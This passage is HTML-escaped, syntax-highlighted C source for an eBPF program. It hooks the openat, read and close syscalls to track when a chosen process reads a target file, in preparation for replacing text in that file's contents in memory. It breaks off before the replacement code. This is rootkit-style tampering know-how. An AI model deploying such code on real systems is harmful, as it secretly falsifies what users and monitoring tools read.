    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_entries&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;__u32&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;__u32&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;map_prog_array&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="c1"&gt;// Optional Target Parent PID&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;target_ppid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="c1"&gt;// These store the name of the file to replace text in&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;filename_len&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;50&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;

&lt;span class="c1"&gt;// These store the text to find and replace in the file&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt;  &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;text_len&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;text_find&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;FILENAME_LEN_MAX&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;text_replace&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;FILENAME_LEN_MAX&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;

&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"tp/syscalls/sys_exit_close"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;handle_close_exit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;trace_event_raw_sys_exit&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c1"&gt;// Check if we're a process thread of interest&lt;/span&gt;
    &lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;pid_tgid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_get_current_pid_tgid&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;pid_tgid&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;check&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_map_lookup_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;map_fds&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pid_tgid&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;check&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="c1"&gt;// Closing file, delete fd from all maps to clean up&lt;/span&gt;
    &lt;span class="n"&gt;bpf_map_delete_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;map_fds&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pid_tgid&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;bpf_map_delete_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;map_buff_addrs&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pid_tgid&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"tp/syscalls/sys_enter_openat"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;handle_openat_enter&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;trace_event_raw_sys_enter&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;pid_tgid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_get_current_pid_tgid&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;pid_tgid&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="c1"&gt;// Check if we're a process thread of interest&lt;/span&gt;
    &lt;span class="c1"&gt;// if target_ppid is 0 then we target all pids&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;target_ppid&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;task_struct&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;task_struct&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;bpf_get_current_task&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
        &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;ppid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;BPF_CORE_READ&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;real_parent&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;tgid&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ppid&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="n"&gt;target_ppid&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="c1"&gt;// Get filename from arguments&lt;/span&gt;
    &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;check_filename&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;FILENAME_LEN_MAX&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
    &lt;span class="n"&gt;bpf_probe_read_user&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;check_filename&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;filename_len&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;char&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;

    &lt;span class="c1"&gt;// Check filename is our target&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;filename_len&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="n"&gt;check_filename&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="c1"&gt;// Add pid_tgid to map for our sys_exit call&lt;/span&gt;
    &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;zero&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;bpf_map_update_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;map_fds&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pid_tgid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;zero&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_ANY&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="n"&gt;bpf_printk&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"[TEXT_REPLACE] PID %d Filename %s&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"tp/syscalls/sys_exit_openat"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;handle_openat_exit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;trace_event_raw_sys_exit&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c1"&gt;// Check this open call is opening our target file&lt;/span&gt;
    &lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;pid_tgid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_get_current_pid_tgid&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;check&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_map_lookup_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;map_fds&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pid_tgid&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;check&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;pid_tgid&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="c1"&gt;// Set the map value to be the returned file descriptor&lt;/span&gt;
    &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;fd&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;ret&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;bpf_map_update_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;map_fds&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pid_tgid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;fd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_ANY&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"tp/syscalls/sys_enter_read"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;handle_read_enter&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;trace_event_raw_sys_enter&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c1"&gt;// Check this open call is opening our target file&lt;/span&gt;
    &lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;pid_tgid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_get_current_pid_tgid&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;pid_tgid&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;pfd&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_map_lookup_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;map_fds&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pid_tgid&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pfd&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="c1"&gt;// Check this is the correct file descriptor&lt;/span&gt;
    &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;map_fd&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;pfd&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;fd&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;map_fd&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="n"&gt;fd&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="c1"&gt;// Store buffer address from arguments in map&lt;/span&gt;
    &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;buff_addr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
    &lt;span class="n"&gt;bpf_map_update_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;map_buff_addrs&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pid_tgid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;buff_addr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_ANY&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="c1"&gt;// log and exit&lt;/span&gt;
    &lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;buff_size&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;size_t&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
    &lt;span class="n"&gt;bpf_printk&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"[TEXT_REPLACE] PID %d | fd %d | buff_addr 0x%lx&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;fd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;buff_addr&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;bpf_printk&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"[TEXT_REPLACE] PID %d | fd %d | buff_size %lu&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;fd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;buff_size&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"tp/syscalls/sys_exit_read"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;find_possible_addrs&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;trace_event_raw_sys_exit&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c1"&gt;// Check this open call is reading our target file&lt;/span&gt;
    &lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;pid_tgid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_get_current_pid_tgid&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
